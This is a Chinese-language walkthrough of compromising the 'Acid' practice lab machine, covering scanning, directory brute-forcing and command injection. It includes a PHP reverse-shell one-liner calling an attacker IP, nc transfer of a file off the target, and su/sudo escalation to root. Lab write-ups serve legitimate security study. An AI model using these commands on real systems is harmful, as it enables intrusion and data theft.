环境
主机:win10
攻击机:kali
IP:172.20.10.128
工具:Nmap、Dirbuster、Burpsuite、Wireshark(网络流量分析)
靶机信息
靶机:Acid
网络连接方式:nat
IP:未知
目标
获取root权限
查看flag
渗透流程
一、信息收集
发现主机
nmap -sP 172.20.10.0/24
Image.png
得到靶机ip:172.20.10.129
端口扫描
nmap -p0-65535 -sV -O 172.20.10.129
Image.png
靶机开放了33447端口,而这个端口跑的是http服务
直接打开
http://172.20.10.129:33447
Image.png
指纹扫描
whatweb http://172.20.10.129:33447
Image.png
可以知道 靶机的操作系统是ubuntu、网站服务器是Apache/2.4.10、关键字/Challenge
是个登录页面
目录扫描
使用dirbuster工具(kali中,dirbuster工具的字典位于/usr/share/dirbuster/wordlists目录下)
字典
directory-list-2.3-medium.txt
Image.png
Image.png
得到四个目录,再次爆破Challenge这个目录
Image.png
爆破出这个目录下的文件
Image.png
访问cake.php
Image.png
发现刚刚一样的小套路,再次爆破Magic_Box 目录
Image.png
得到
Image.png
访问commadn.php
Image.png
一个命令执行页面
二、漏洞挖掘
打开brupsuite 进行抓包
Image.png
Image.png
Image.png
加上 | ls
Image.png
可以发现这个页面存在命令注入,我们用它来获取shell
三、获取shell
1 . 制作php反弹shell
php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
url编码后
php%20-r%20'%24sock%3Dfsockopen(%22172.20.10.128%22%2C5555)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B'
2 . nc监听
Image.png
3 . 放入shell执行
Image.png
4 . 获得一个shell
Image.png
四、提权
1 . 查看用户
cat /etc/passwd
Image.png
2 . 查找用户文件
find / -user acid 2>/dev/null
Image1.png
发现一个网络流量包文件
3 . 用nc传输到kali
kali
nc -lvnp 3333 > hint.pcapng
靶机
nc 172.20.10.128 3333 < /sbin/raw_vs_isi/hint.pcapng
Image2.png
Image3.png
4 . 使用Wireshark进行分析
Wireshark hint.pcapng
Image4.png
除tcp协议 其他都过滤掉
Image5.png
找到这条数据
Image6.png
得到密码
1337hax0r
在前面页面也有这个密码提示
Image7.png
5 . 提权到saman
su saman
提示
Image8.png
执行
python -c 'import pty;pty.spawn("/bin/bash")'
继续
su saman
输入密码
1337hax0r
Image9.png
成功提权到saman
6 . 提权到root
sudo -i
Image10.png
成功提权到root
7 . 查看flag
Image11.png
完成渗透
知识点
知识点一
php反弹shell
php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
知识点二
网站访问报404 是不存在该目录或文件,报403是禁止访问该目录或文件。
知识点三
查找每个用户文件
find / -user acid 2>/dev/null
知识点四
su and sudo and sudo -i 用法和区别
sudo 暂时切换到超级用户模式以执行超级用户权限。输入的是当前用户密码,但是有时间限制,一般为15分钟。
su 切换到某某用户模式,格式为 su 用户名,默认为root。密码为用户名密码。
sudo -i 为了频繁的执行某些只有超级用户才能执行的权限,输入的是当前密码,不用每次输入密码,没有时间限制。
知识点五
scp命令传输文件,需要开启ssh服务
scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/ #将目录下的文件 远程传输到10.10.10.140的/root/目录下
知识点六
kali安装ssh
apt-get install ssh # 安装ssh
service ssh start # 打开ssh服务
service ssh status # 查看状态
service ssh stop # 停止ssh服务
坑点
1 .
在php反弹shell进行url编码的时候,不能完全编码,要对个别字符进行保留,不然会瞬间蹦掉。
php%20-r%20'%24sock%3Dfsockopen(%22172.20.10.128%22%2C5555)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B'
2 .
在用nmap对靶机ip进行扫描,不使用下面参数根本扫描不出靶机信息
-p0-65535
3 .
在分析网络流量包的时候,发现有各式各样的协议包,照文档上看,除tcp协议外,全部过滤。然后一条条查看,在在下图上找到这个数据包,然后里面存在密码。放在实际情况上,又是一个大海捞针的靶机。
Image.png
总结
这套靶机难易程度一般,难的地方还是去找到密码,拿到小权限的shell去找密码提权是巨坑的。看了文档,有不同的方式可以拿到命令注入界面,但是我是通过dirbuster把目录爆破出来的,所以免去了在images目录下找图片这一步,直接进行命令注入。学到了一个新的反弹shell,在网页执行sql语句、反弹shell等需要进行url编码,这点我老是记不住。靶机的流程都一致,不一致的就是获取webshell的方式不同,其余都大同小异。目前知道,命令注入拿shell、文件上传拿shell,mysql数据库写shell。还没有实践的有mysql写shell。
网友评论